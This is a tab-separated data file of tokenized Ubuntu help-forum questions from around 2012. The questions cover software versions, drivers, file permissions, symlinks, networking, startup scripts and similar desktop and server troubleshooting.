108641	upgrading to gawk 4.0	i am working on a project that has me using gawk . i had been using fedora 16 which uses gawk 4.0 but have recently changed over to xubuntu 11.10 and found out that xubuntu runs an older version of gawk ( 3.1.8 i believe ) . there are probably 3 dozen different utilities that rely on gawk in xubuntu and i really do n't want to break anything . what are my options for running gawk 4.0 in xubuntu 3.1.8 ? is there any way i can run some kind of isolated version of gawk 4.0 that i can use for my project and still have gawk 3.1 used by the system ?
108648	bumblebee or ironhide ?	i have an asus n53s , and i am using bumblebee . i can see it from the frame rates in tux racer . some people refer to bumblebee and some to ironhide . what is the difference ?
108652	how can i change my maximum resolution on ubuntu 11.10 ?	i have a 1080p monitor connected to my pc running ubuntu via a vga cable , however when i installed the amd drivers from the additional drivers programme , ubuntu seems to think that my monitors maximum resolution is 1600x1200 . this results in the screen being widened substantially , and everything being slightly fuzzy . im not really sure what to do , as i havent really used ubuntu before .
108657	libreoffice math not working ... how to start troubleshooting ?	after update to libreoffice 3.5 , i can no longer create/edit equations with math . if i insert an equation or try to edit an old one , i will not get the windows split at the bottom of the screen where i can write the text . what can i do to troubleshoot this ? is it a known issue ( i have n't found any info on it , anyway ) ?
108660	ubuntu software center / update manager not working - could not open file	i 'm having trouble with my software center , i 'm running natty narwale and receive the following error when i try to open update manager . could not initialize the package information an unresolvable problem occurred while initializing the package information . please report this bug against the 'update-manager ' package and include the following error message : 'e : could not open file /var/lib/apt/lists/ubuntu % 2011.04 % 20 % 5fnatty % 20narwhal % 5f % 20- % 20release % 20i386 % 20 ( 20110427.1 ) _dists_natty_release - open ( 2 : no such file or directory ) , e : the package lists or status file could not be parsed or opened . ' as i get similar issues in the software center i 've tried removing it via the terminal but i get the same problem : reading package lists ... error ! e : could not open file /var/lib/apt/lists/ubuntu % 2011.04 % 20 % 5fnatty % 20narwhal % 5f % 20- % 20release % 20i386 % 20 ( 20110427.1 ) _dists_natty_release - open ( 2 : no such file or directory ) e : the package lists or status file could not be parsed or opened . does anyone have any thoughts how i can resolve this ?
108662	how to install cairo 1.8.10	the package libcairo2-dev is the latest version of the cairo graphics library ( 1.10.2 ) . is there any way i can install version 1.8.10 ? i 'm running 11.10 , but would be interested in a general solution if possible .
108664	slow server on web-based writes and ssh login	i have an ubuntu 10.04 server that 's going a bit slow . it 's very slow to log in via ssh , and it 's very slow when making edits via a mediawiki instance installed on there . for normal read access to the hosted website , it 's fast ( i have apc installed , fwiw ) , and it 's also fast with ssh once i 'm actually logged in . what sort of things should i be checking as possible sources of this problem ? i need to diagnose it remotely . cheers jp
108666	log destination ip with iptables	i want to log destination ip addresses in my ubuntu router . i have two network cards eth0 - 10.0.101.254 eth1 - 10.0.101.253 10.0.101.254 is the gw for all hosts on my network . the router works perfectly , but i want to log all destination addresses on outgoing traffic through the router . how can i set this up with iptables ? or is there another way to log this ?
108669	why does `` shutdown '' option only log me out ?	when i need to reboot ( sadly , the days of 300+ days of uptime appear to be long gone ) while logged into my account , the shut down option only logs me out - it does not shutdown the system . when at the login screen , selecting the shutdown or restart option does nothing - i get a dialog box , but regardless of which option i select , nothing happens . interestingly enough , when i first boot up , selecting shutdown from the login screen works , as long as i have n't logged in yet . is this a known problem ? any way to figure out how to fix it ?
108674	regular installation from wubi	i have ubuntu installed on my d drive using wubi . there are some other files on d drive . win 7 is installed on c drive . what would be the best way to make regular installation of ubuntu ? on d or c drive ? do i have to make a partition ? disk /dev/sda : 640.1 gb , 640133946880 bytes 255 heads , 63 sectors/track , 77825 cylinders , total 1250261615 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x58fd0634 device boot start end blocks id system /dev/sda1 * 2048 206847 102400 7 hpfs/ntfs/exfat /dev/sda2 206848 1045460991 522627072 7 hpfs/ntfs/exfat /dev/sda3 1045460992 1250258943 102398976 7 hpfs/ntfs/exfat
108677	wireless connection freezes on a macbook pro ( early 2010 model ) with a bcm4322	i have a macbook pro ( early 2010 model ) , and i 've been having problems with the network connection periodically stopping . the wireless network indicator shows that the signal is at full strength ( it should be , the router is less that 2 meters from me ) , but i 'm unable to access anything on the network . none of the other computers are experiencing a problem . the connection will be fine from 5 minutes to 12 hours , but it will stop . i 'm not even sure how to diagnose the problem to be honest . while i 'm not a beginner , i do struggle when i get into cli . the wireless connection was fine when i ran osx and windows 7 on this machine , but now that i 've moved to ubuntu i 've started to have a problem . any help , additional information request , or advice on how to diagnose the problem are gratefully received . i tracked my wireless card version down to : `` broadcom bcm4322 '' , but the drivers appear to be the correct ones , so other than updating ( which i 've done ) i do n't know how else to proceed with that line . edit : at the request of @ peach heres some more information . kernal version : uname -r : 3.0.0-16-generic my connection froze at 13:07 , and then 3minutes later , this appeared : tail -f /var/log/message : mar 1 13:10:30 rob-laptop kernel : [ 91969.072690 ] userif-3 : sent link up event . mar 1 13:10:30 rob-laptop kernel : [ 92447.192468 ] cfg80211 : calling crda to update world regulatory domain mar 1 13:10:30 rob-laptop kernel : [ 92447.198444 ] cfg80211 : world regulatory domai updated : mar 1 13:10:30 rob-laptop kernel : [ 92447.198448 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) mar 1 13:10:30 rob-laptop kernel : [ 92447.198454 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) mar 1 13:10:30 rob-laptop kernel : [ 92447.198459 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) mar 1 13:10:30 rob-laptop kernel : [ 92447.198464 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) mar 1 13:10:30 rob-laptop kernel : [ 92447.198470 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) mar 1 13:10:30 rob-laptop kernel : [ 92447.198475 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) mar 1 13:10:30 rob-laptop kernel : [ 92447.233326 ] userif-3 : sent link down event . mar 1 13:10:32 rob-laptop kernel : [ 92447.233335 ] userif-3 : sent link up event . mar 1 13:10:32 rob-laptop kernel : [ 92449.266633 ] bridge-wlan0 : device is wireless , enabling smac mar 1 13:10:32 rob-laptop kernel : [ 92449.466506 ] userif-3 : sent link down event .
108682	i ca n't permanently add icons to the top bar anymore- they disappear upon reboot	i accidentally deleted the top bar and now it will not save icons that i add to it . i 'll spend 5 minutes adding icons back only to find they disappear upon rebooting . this has to be the strangest , glitchiest os i 've ever used . the icons are randomly changing positions on the bar , sometimes are half drawn or not at all , or spaced out unusually , or not there at all . what the heck ? i just want a bar with my icons that does n't change .
108689	how can i get tab completion with juju in zsh ?	i use zsh as my shell and tab completion does n't work , how can i enable it ?
108691	software center wo n't start after upgraded to 11.10	i just upgraded to 11.10 but i ca n't get software center work . every time i click the icon , there is no responding . if i run sudo software-center in terminal , i get the following error code : 2012-02-29 01:33:46,899 - softwarecenter.ui.gtk3.em - info - em 's : 17 15 21 2012-02-29 01:33:47,677 - softwarecenter.backend.reviews - warning - could not get usefulness from server , no username in config file 2012-02-29 01:33:47,743 - softwarecenter.ui.gtk3.utils - info - softwarecenter style provider for radiance gtk theme : /usr/share/software-center/ui/gtk3/css/softwarecenter.css *** buffer overflow detected *** : /usr/bin/python terminated ======= backtrace : ========= /lib/x86_64-linux-gnu/libc.so.6 ( __fortify_fail+0x37 ) [ 0x7fd02938a7f7 ] /lib/x86_64-linux-gnu/libc.so.6 ( +0xf7710 ) [ 0x7fd029389710 ] /usr/local/lib/enchant/libenchant_myspell.so ( _zn7hashmgr8add_wordepkciiptis1_b+0x7b ) [ 0x7fd00852b3bb ] /usr/local/lib/enchant/libenchant_myspell.so ( _zn7hashmgr11load_tablesepkcs1_+0x268 ) [ 0x7fd00852bbe8 ] /usr/local/lib/enchant/libenchant_myspell.so ( _zn7hashmgrc1epkcs1_s1_+0xb2 ) [ 0x7fd00852bd82 ] /usr/local/lib/enchant/libenchant_myspell.so ( _zn8hunspellc2epkcs1_s1_+0x8a ) [ 0x7fd00852c0ba ] /usr/local/lib/enchant/libenchant_myspell.so ( _zn14myspellchecker17requestdictionaryepkc+0x39d ) [ 0x7fd0085394ed ] /usr/local/lib/enchant/libenchant_myspell.so ( +0x29656 ) [ 0x7fd008539656 ] /usr/local/lib/libenchant.so.1 ( +0x41b8 ) [ 0x7fd01a9151b8 ] /usr/local/lib/libenchant.so.1 ( enchant_broker_request_dict+0xc3 ) [ 0x7fd01a9165b3 ] /usr/lib/libwebkitgtk-3.0.so.0 ( +0x48cf53 ) [ 0x7fd01afa9f53 ] /usr/lib/libwebkitgtk-3.0.so.0 ( +0x4c4bbe ) [ 0x7fd01afe1bbe ] /usr/lib/libwebkitgtk-3.0.so.0 ( +0x4c546d ) [ 0x7fd01afe246d ] /usr/lib/x86_64-linux-gnu/libgobject-2.0.so.0 ( g_type_create_instance+0x513 ) [ 0x7fd027f06373 ] /usr/lib/x86_64-linux-gnu/libgobject-2.0.so.0 ( +0x125ac ) [ 0x7fd027ee65ac ] /usr/lib/x86_64-linux-gnu/libgobject-2.0.so.0 ( g_object_newv+0x294 ) [ 0x7fd027ee8e94 ] /usr/lib/python2.7/dist-packages/gi/_gobject/_gobject.so ( +0xbcea ) [ 0x7fd02639ccea ] /usr/lib/python2.7/dist-packages/gi/_gobject/_gobject.so ( +0x14371 ) [ 0x7fd0263a5371 ] /usr/bin/python [ 0x47c1d1 ] /usr/bin/python ( pyobject_call+0x3a ) [ 0x41ad2a ] /usr/bin/python ( pyeval_evalframeex+0x92e ) [ 0x4b6b9e ] /usr/bin/python ( pyeval_evalcodeex+0x13d ) [ 0x4bcd2d ] /usr/bin/python [ 0x448edf ] /usr/bin/python ( pyobject_call+0x3a ) [ 0x41ad2a ] /usr/bin/python [ 0x43074e ] /usr/bin/python ( pyobject_call+0x3a ) [ 0x41ad2a ] /usr/bin/python [ 0x480c73 ] /usr/bin/python [ 0x47c1d1 ] /usr/bin/python ( pyobject_call+0x3a ) [ 0x41ad2a ] /usr/bin/python ( pyeval_evalframeex+0x92e ) [ 0x4b6b9e ] /usr/bin/python ( pyeval_evalcodeex+0x13d ) [ 0x4bcd2d ] /usr/bin/python [ 0x448edf ] /usr/bin/python ( pyobject_call+0x3a ) [ 0x41ad2a ] /usr/bin/python [ 0x43074e ] /usr/bin/python ( pyobject_call+0x3a ) [ 0x41ad2a ] /usr/bin/python [ 0x480c73 ] /usr/bin/python [ 0x47c1d1 ] /usr/bin/python ( pyobject_call+0x3a ) [ 0x41ad2a ] /usr/bin/python ( pyeval_evalframeex+0x92e ) [ 0x4b6b9e ] /usr/bin/python ( pyeval_evalcodeex+0x735 ) [ 0x4bd325 ] /usr/bin/python ( pyeval_evalframeex+0x7eb ) [ 0x4b6a5b ] /usr/bin/python ( pyeval_evalframeex+0xb07 ) [ 0x4b6d77 ] followed by memory map . however , sudo apt-get update & upgrade work fine , so does synaptic package manager . how can i fix this problem ? thanks
108697	doubt about file access rights between user/groups	i am the single user on this linux machine . i tried the following procedure to protect files , but it does not work as i expected . could someone explain why ? $ touch file $ sudo chown root : root file $ sudo chmod a-w file $ ls -l file -r -- r -- r -- 1 root root 0 2012-02-29 01:06 file $ rm file rm : remove write-protected regular empty file `file ' ? yes $ ls -l file ls : can not access file : no such file or directory '' file '' is read-only and owned by root . why was my regular user able to delete it ?
108702	changed permissions of / to user	i stupidly ran sudo chown -r carlos : carlos / and carlos is my user . this changed all files to be carlos and i could not boot up again ( because the root files were now owned by # 1000 ) and i cant get sudo acess in live cd ( because the owner of /usr was changed to my user ) . can anyone help me ? fyi i have mounted my hard drive .
108704	how to `` properly '' downgrade libreoffice versions	i am using the stable libreoffice ppa , which just pushed out 3.5.0 and i ( foolishly ) upgraded from 3.4.5 . now my libreoffice is broken , with all sorts of issues like icons and launchers not appearing , being unable to alt+tab or alt+~ , the unity dock filling up with ( broken ) libreoffice icons that do not disappear when files are closed , and random errors and crashes . what is the `` proper '' way to downgrade the libreoffice version so that all new files get purged ?
108708	only 24gb of 32gb ram showing on server 11.10	i just installed ubuntu server 11.10 64bit and when i execute free -m it only shows a total of 24094 . this is a fairly new build and i was able to see all 32gb on solaris 11. total used free shared buffers cached mem : 24094 582 23511 0 11 195 -/+ buffers/cache : 375 23718 swap : 24571 0 24571 i am running a gigabyte 990fxa-ud5 mobo with the amd 8150 black edition proc . any input is appreciated . ** update ** dmidecode is showing the dimm in the first slot as only 4096 mb handle 0x002a , dmi type 17 , 27 bytes memory device array handle : 0x0029 error information handle : not provided total width : 64 bits data width : 64 bits size : 4096 mb form factor : dimm set : none locator : a0 bank locator : bank0/1 type : unknown type detail : none speed : 1333 mhz ( 0.8 ns ) manufacturer : serial number : asset tag : part number : handle 0x002b , dmi type 17 , 27 bytes memory device array handle : 0x0029 error information handle : not provided total width : 64 bits data width : 64 bits size : 8192 mb form factor : dimm set : none locator : a1 bank locator : bank2/3 type : unknown type detail : none speed : 1333 mhz ( 0.8 ns ) manufacturer : serial number : asset tag : part number : handle 0x002c , dmi type 17 , 27 bytes memory device array handle : 0x0029 error information handle : not provided total width : 64 bits data width : 64 bits size : 8192 mb form factor : dimm set : none locator : a2 bank locator : bank4/5 type : unknown type detail : none speed : 1333 mhz ( 0.8 ns ) manufacturer : serial number : asset tag : part number : handle 0x002d , dmi type 17 , 27 bytes memory device array handle : 0x0029 error information handle : not provided total width : 64 bits data width : 64 bits size : 8192 mb form factor : dimm set : none locator : a3 bank locator : bank6/7 type : unknown type detail : none speed : 1333 mhz ( 0.8 ns ) manufacturer : serial number : asset tag : part number :
108710	how to implement raid 1 on ubuntu 11.10 desktop ?	how to set up raid 1 [ software , hardware or fake ] on ubuntu 11.10 ? can it be done through unity ?
108712	how can i find which song is currently playing programmatically ?	i 'm trying to make a little bash script which i could call with a keyboard shortcut and which could detect which song is currently playing and vote it up or down , stuff like that . how can i get information about the currently playing song ? and what about the previous song ? i 'm using banshee , but maybe there is a way to get currently playing song which works with multiple players ? or maybe a general way which can be tweaked to work on different players ?
108738	what gtk widget is this ?	lately , i 've seen the widget below appear in gtk applications . i ca n't find it in glade . what is it ?
108742	how to speed up ubuntu 11.10 ( desktop )	i have ubuntu 11.10 installed in rather old desktop pc.i 'd like to continue using it with more speed but installing new hardware maybe impossible .
108745	why is ubuntu not publicized in big conferences ?	i am simply wondering why the ubuntu os is not presented in big conferences at launches ? i see other os-es gaining a lot of market share by doing so . i think that ubuntu even if it is free of charge could benefit from big presentation shows at launch like windows or apple 's mac os .
108747	how do i get xvidcap working ?	previously , i used xvidcap to record screencasts in ubuntu . i have upgraded to 12.04 lts ( precise ) and it seems that xvidcap has been removed from the archive . any suggestions on a replacement ?
108752	aptana unable to find java	i am getting the following errors when i am running aptana a java runtime environment ( jre ) or java development kit ( jdk ) must be available in order to run aptanastudio3 . no java virtual machine was found after searching the following locations : /opt/aptanastudio3/jre/bin/java java in your current path . 300e7z : ~ $ java -version java version `` 1.7.0_03 '' java ( tm ) se runtime environment ( build 1.7.0_03-b04 ) java hotspot ( tm ) server vm ( build 22.1-b02 , mixed mode ) my jdk path is /usr/local/jdk1.7.0_03
108753	why ca n't i change keyboard shortcuts ?	i can bring the window up no problem : the shortcut i want to modify is selected , i press on ctrl+i , and nothing happens . i tried pressing and holding 5 seconds . nothing happened . ever heard of this ? can anyone reproduce this ?
108758	runt integrated intel graphics card + nvidia pcie graphics card ?	its days i am searching for information/help . is this possible at all ? i am running ubuntu 11.10 on an intel core i3 530 on a intel dh55hc mainboard . i have 2 monitors attached , one on dvi and one on hdmi . i want to ad a third or eaven a fourth monitor using an additional graphics card nvidia in pcie slot . i cant get an image on all monitors at the same time . i am wondering if this is possible at all ? any ideas where i can get information about this ? thanks in advance roberto
108764	how do i send text messages to the notification bubbles ?	i wrote a python code for getting random text into a .txt file . now i want to send this random text into notification area via 'notify-send ' command . how do we do that ?
108765	how to avoid opening a second instance ?	i set up lirc to control my pc with a remote . to switch between different modes i edited .lircrc as follows : begin vlc include ~/.lirc/vlc end vlc begin gnome include ~/.lirc/gnome end gnome begin firefox include ~/.lirc/firefox end firefox begin me-tv include ~/.lirc/me-tv end me-tv begin prog = irexec button = key_yellow config = if [ -n $ ( pgrep -f vlc ) ] ; then ( vlc & ) ; fi mode = vlc end begin prog = irexec button = key_green mode = gnome end begin prog = irexec button = key_red config = if [ -n $ ( pgrep -x firefox ) ] ; then ( firefox & ) ; fi mode = firefox end begin prog = irexec button = key_blue config = if [ -n $ ( pgrep -x me-tv ) ] ; then ( me-tv & ) ; fi mode = me-tv end everything works fine with it - except switching to firefox : when firefox is running and i press the red button it switches the mode ( as it should ) and opens a second window/instance of firefox ( as it should not ) . the problem appears only with firefox . edit → preferences → tabs → open new windows in a new tab instead is already enabled : what happens when firefox is running and i start firefox in a terminal ? firefox - a second window opens firefox about : startpage - a new tab in firefox opens with the preconfigured startpage ( ! ) firefox about : blank - a new tab in firefox opens with my personal startpage ( speeddial ) firefox chrome : //speeddial/content/speeddial.xul ( which is the adress of the speeddial startpage ) - nothing happens what happens when firefox is not running and i start firefox in a terminal ? firefox - firefox opens as configured in preferences ( show my windows and tabs from last time ) firefox about : startpage - firefox opens with an additional new tab with the preconfigured startpage ( ! ) firefox about : blank - firefox opens with an additional new , blank tab firefox chrome : //speeddial/content/speeddial.xul - firefox does n't open : *** preventing external load of chrome : uri into browser window.use -chrome < uri > instead so , when i modify the command in the script ( config = ... ) and add an adress like about : blank it solves the problem partly . as problem remains that it does n't put firefox in the foreground when it is already running . this only happens sometimes . could anyone help me to edit this script to fix this misbehaviour ? ( source of the script which i modified . )
108767	symlink a directory and automatically sync its content	suppose i have a folder foo with the two content : data1.txt cfg.txt now i create a new symlink called fo2 which points to directory foo : cp -s -r /home/user123/foo /home/user123/fo2 it 's working okay . but then , i try to made new files in foo folder , say data2.txt . when i opened fo2 folder , it only contains a symlink to data1.txt and cfg.txt data2.txt does n't exist . how to make the content of fo2 folder automatically synced with with foo so data2.txt automatically appears in fo2 ? ln -s is not an option because i want the content of cfg.txt in foo and fo2 folder to be different . if i use copy -s -r , later i just come inside fo2 folder , delete cfg.txt symlink and recreate a real cfg.txt with different content .
108771	what is the difference between a hard link and a symbolic link ?	as the title says , i would like to know the difference between a hard link and a soft link created by the command ln . the command man ln does provide information , but does not sufficiently answer my question . thanks in advance . also , it would be nice if someone could provide a setting where hard link might be preferable over a symbolic link .
108773	headphones do n't work	hello im new at this in linux , i have a problem the computer speakers works fine but when i connect the headphones i cant listen anything , i have a packard bell easynote mz35-f withe ubuntu 11.10 version kernel 3.0.0-16-generic , i punt any info of my pc to help to find a solution if someone have idea how fix it , please coment thanks . `` ls pci '' 00:14.2 audio device : ati technologies inc ixp sb4x0 high definition audio controller ( rev 01 ) '' sudo lshw '' deathnotebook description : notebook version : ? ? ? ? ? ? ? ? width : 32 bits capabilities : smbios-2.4 dmi-2.4 smp-1.4 smp configuration : administrator_password=enabled boot=oem-specific chassis=notebook cpus=1 frontpanel_password=unknown keyboard_password=unknown power-on_password=disabled uuid=80ed58e6-0886-db11-8000-4e45435f4349 *-core description : motherboard product : easynote mz35 vendor : packard bell bv physical id : 0 version : d3b serial : qpcpcb64311369 ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? *-firmware description : bios vendor : packard bell physical id : 0 version : v0.12 date : 10/23/2006 size : 102kib capacity : 960kib capabilities : isa pci pcmcia pnp upgrade shadowing escd cdboot acpi usb smartbattery biosbootspecification *-cpu description : cpu product : intel ( r ) celeron ( r ) m cpu 410 @ 1.46ghz vendor : intel corp. physical id : 4 bus info : cpu @ 0 version : 6.14.8 serial : 0000-06e8-0000-0000-0000-0000 slot : u23 size : 1460mhz capacity : 1460mhz width : 32 bits clock : 100mhz capabilities : boot fpu fpu_exception wp vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov clflush dts acpi mmx fxsr sse sse2 ss tm pbe constant_tsc up arch_perfmon bts aperfmperf pni monitor tm2 xtpr pdcm *-multimedia description : audio device product : ixp sb4x0 high definition audio controller vendor : ati technologies inc physical id : 14.2 bus info : pci @ 0000:00:14.2 version : 01 width : 64 bits clock : 33mhz capabilities : pm msi bus_master cap_list configuration : driver=hda intel latency=64 resources : irq:40 memory : c0400000-c0403fff '' cat /proc/asound/card0/codec # * | grep codec '' codec : realtek alc861-vd codec : lsi id 1040 '' sudo aplay -l '' tarjeta 0 : sb [ hda ati sb ] , dispositivo 0 : alc861-vd analog [ alc861-vd analog ] subdispositivos : 0/1 subdispositivo # 0 : subdevice # ubuntu 11.10 - '' uname -r '' version del kernel 3.0.0-16-generic*strong text*
108778	how do i know what the latest version of rhythmbox is ?	a few questions guys , would really be glad if you could help . how do i know what the latest version of rhythmbox is ( is there a rhythmbox official repository ? ) ? and say i dont have the latest version of ubuntu ( i 'm using 10.04 , personally my favourite ubuntu release yet , especially since i 'm not a big fan of unity ) , can i upgrade rhythmbox to the leatest version ? if so how ? thanks in advance .
108785	when adding a magnet link in deluge how can i choose which files in the torrent to download ?	if i click on some magnet torrent link , deluge opens but i can not choose which files in the torrent to download . if i save the torrent file on desktop and drag & drop it do deluge , i have then an option to choose which files i want to download . is there some hack to have the same option when deluge activates on some magnet url ?
108791	can not read ntfs partition while in ubuntu	( translation ) hello everyone i am a new user ubuntu 11.10 . i 'm experiencing an oddity : a couple of days or so i can not see any data contained on a disk ( ntfs file system ) . the files actually exist , but ubuntu does not display them ( from windows you can see them ) . previously visualized them and i do not think i 've changed settings of any kind ( at least consciously ; - ) ) . does anyone have advice for me ? ( orginal ) ciao a tutti sono un nuovo utente ubuntu 11.10. sto riscontrando una stranezza : da un paio di giorni circa non riesco pi첫 a visualizzare i dati contenuti in un disco ( file sistem ntfs ) , i file effettivamente ci sono , ma ubuntu non li visualizza ( da windows si riesce a visualizzarli ) . in precedenza li visualizzavo e non mi pare di aver modificato impostazioni di sorta ( almeno consapevolmente ; - ) ) . qualcuno ha consigli da darmi ? grazie in anticipo !
108796	clementine/gnome multimedia keys do n't stick	my keyboard has the multimedia keys on the function keys , with fn+f6 to play/pause etc . the problem is these do n't work in my music player ( clementine ) after rebooting . if i go into the preferences - > global shortcuts , and check and uncheck that box for `` use gnome 's shortcut keys '' , then they work again . meaning , at boot it is unchecked and they do n't work , but if i toggle the checkbox on and off then they magically work again . so what does that checkbox actually do ? is there some way i can automate whatever it does in a script at boot time , so that my multimedia keys will always work without the stuffing around ? my keyboard is an logitech mk250 . i 'm on 11.10 , with gnome-shell .
108800	run shell script on startup or boot	my problem in a nutshell is that i have to run a script every time i use my computer so i 'm trying to automate the process a bit . my system has the nvidia gt540m vga card . the card is dual . it has one high end card for demanding tasks , and it uses the low end onboard card for everything else . ubuntu at this time does not support this type of vga card , and it powers them both at all times , when only using the onboard one . this results in very low battery life time . i am rather new to ubuntu so i had to follow a ton of tutorials before actually finding a script to solve the problem . i downloaded an acpi_call folder to the directory /home/anpel , and with the following commands , i kill the card : cd /acpi_call sudo insmod acpi_call.ko sudo ./test_off.sh next step , since i had to manually run the commands each and every time i booted , was to make a shell script on my desktop , which i run , it prompts me for my password , and after providing it , it kills my card . the script looks like this : cd ~/acpi_call sudo insmod acpi_call.ko sudo ./test_off.sh echo vga card dead exit now , i am trying to make my system run this script every time my computer boots , so i do n't have to do it manually every time . i do n't have the experience to change anything to my system without at least some guidance , because i think it 's highly likely i will mess everything up , and i have no idea how to clean up my mess , so i have n't really tried anything , but i am reading that adding my script to the /etc/rc.local file will get the job done . is that true or is there something else i have to try ? -- -- edit -- -- - i use ubuntu 11.10 , sorry for not mentioning that .
108802	nvidia geforce gt525m problem with ubuntu 11.10	i have problem with nvidia in 11.10 when i setup nvidia driver gnome not work and more effects too and compiz not work ( i use laptop , , video memory : 1gb dedicated intel/nvidia ) please help me
108804	`` files '' favorite disappeared in gnome shell , how to bring it back ?	i have installed gnome shell with ubuntu , and it works pretty well . i may have removed accidently the `` files '' favorite in the activity menu but it is impossible to put it back on the favorites dock . if i open a folder and right click on the icon of the folder that appear un the favorites dock there is no option `` add to favorites '' , so no possibility to bring `` files '' favorite back in the dock . any idea ? thanks
108805	how can i make the lxterminal accept the arrow key for history search ?	in the bash , one can enable a `` search-as-you-type-like '' behaviour by changing eg . the .inputrc : 1 # # arrow up 2 `` \e [ a '' : history-search-backward 3 # # arrow down 4 # '' \e [ b '' : history-search-forward is there anything similar in the lxterminal , besides hitting ctrl+r ?
108806	geany unnecessarily truncates active filename in titlebar	in my quest for a relatively fat-free editor that still autoloads last session and has syntax highlighting , i became dependent on geany , customizing it , installed some plugins etc . is there a way to have the titlebar print the full name of the file when there 's ample space for it , not eating the inner portion with a `` ... '' string instead ? or customize to shorten anything else but the filename ? i tend to work on lots of files with the same prefix and suffix , differing with only a timestamp or other fields in between . this makes it hard to distinguish with the glance of an eye which file i 'm currently on when switching between tabs . already checked the geany docs online & feature request , so i figured my host os forum was the next best thing .
108809	backup ubuntu server 11.10	i downloaded remastersys and it created an iso but i can not get it to install my system on another hard drive . when it boots it shows the loading bar , which from my experience appears when starting ubuntu desktop , and then boots to a distorted command line , and not with the correct user @ host . so i ask is there a way to create a distributable backup of all my settings on my working server and install it on several computers ? can someone provide me with a source.list url that will enable me to backup my server rather than desktop which i think the remastersys version i downloaded is doing . current one i 'm currently using is the deb file from : http : //www.geekconnection.org/remastersys/repository/karmic/ thanks
108811	integrate ubuntu desktop to a windows network	i currently have a windows network ( 1 windows 2008 r2 server as the domain controller and 1 windows vista client ) . i have a ubuntu 32 bit 10.04 client only ( no linux server - so the client is not on a existing linux network ) and would like to integrate it into the windows network ( ad ) environment . please could you inform if this is possible and if yes , what are the steps to take to integrate it .
108814	`` glib.h : no such file or directory '' error despite installing libglib2.0-dev	i 'm trying to make gromacs the error i 'm getting is : fatal error : glib.h : no such file or directory i 've seen that there are already questions related to this , and i followed their advice and ran the following : sudo apt-get install libglib2.0-dev i got reading package lists ... done building dependency tree reading state information ... done libglib2.0-dev is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 270 not upgraded . after this , when i re-run make , why do i it still get the same error ?
108820	chromium not showing google search suggestions	when i start typing a search word in google chrome in windows , i get suggestions for popular searches by default . i recall having the same feature in chromium ( or chrome.. ? ) in my earlier ubuntu / linux mint installation . what do i have to do to enable this feature ? i could n't find anything in the preferences . my chromium 's version is 17.0.963.56 ( developer build 121963 linux ) built on ubuntu 11.04 , running on linuxmint 11
108822	how do i check the status of apf firewall ?	how to check whether apf ( advanced policy firewall ) is running after the reboot ? it doesnât have any status , so how can we know ?
108828	how can i get a list of files on my computer that are not `` owned '' by any package ?	i 'm contemplating writing a script that does this : goes through each file in /usr/lib does a dpkg -s search on each file . reports a list of `` orphan '' files not belonging to any .deb package . the idea is that over time , i 've installed a lot of make install software and i 'd like to get a list of leftover files from manually installed software i 've since deleted .
108830	overlay icons for applications in spread mode	i am looking for something like what this gnome-shell extension offers . that is , i would like to see the icons of the applications in the spread mode . is it , in anyway , possible in unity ?
108832	compiling on ubuntu ( 10 or 11 ) 32 bits for debian 6 64 bits	does a program compiled on ubuntu 32 bits work on debian 6 64 bits ? i went googling and found : '' normally a program compiled on a 32bit system works on a 64 also , but not the other way . '' so the 32 bits - > 64 bits compatibility should not be a problem . what about ubuntu - > debian ? best regards .
108835	how do i use the fingerprint scanner on a hp probook ?	i have a fingerprint scanner on my hp probook laptop . i 'm running ubuntu 11.10 on it . how do i make use of it ?
108843	ubuntu software center	when i try to install any application without the support of canonical , the software center said that `` you have a problems with internet connection '' or `` requires installation of untrusted packages '' and does not let me to install for this reason , i am afraid to reinstall the system , because after reinstalling , i would not be able to download the necessary application to me please help me as soon as possible ! ! !
108844	how to enable windows 7 recovery after installing ubuntu ?	i bought a asus k series laptop with windows 7 home premium . i removed windows and installed ubuntu . i left the recovery partition untouched and ubuntu created an entry in grub named windows recovery environment ( loader ) . when i boot into this , windows 7 logo appears and then a screen with asus logo appears but the laptop reboots automatically without displaying the recovery options window . in the default setup , f9 loaded the recovery screen but now that does n't work either . what should i do to recover the factory setup of windows ?
108845	can brasero damage my drive ?	my cd/dvd burner failed after using brasero to burn a cd ( which failed ) . i 've ordered a new drive but was wondering could brasero have caused the damage ? it was probably just a coincidence that my drive failed then but i want to be sure . i 've studied up on genisoimage and wodim and will use them instead in the future .
108851	asked for sudo password , post login to bash shell	with 11.10 when any of my users with the bash shell login upon success they are asked to provide their sudo password e.g . last login : fri jan 20 19:13:36 2012 from x.x.x.x [ sudo ] password for *user* : however , using a different shell ( viz . zsh ) they are n't asked for their sudo password . what 's up ? [ edit : more info ] so , of course it was obvious , but strange still . /etc/bash.bashrc # ! /bin/sh -e # execute firstlogin.sh only once if [ ! -e /root/firstlogin_done ] ; then if [ -e /root/firstlogin.sh ] ; then /root/firstlogin.sh fi # this part should not be necessary any more # sudo dpkg-reconfigure -p critical console-setup & > /dev/null sudo touch /root/firstlogin_done fi the file is created just fine e.g . $ sudo ls -al /root/firstlogin_done -rw-r -- r -- 1 root root 0 2012-02-29 16:04 /root/firstlogin_done [ edit : is it a bug ] so , i get why this happens . but , i do n't get why this is happening . is this a bug that i have n't updated ?
108854	how do i recover my main login password ?	i have forgot my main password for main log in and for everything that i need to authenticate things for . how can i recover or reset my password ?
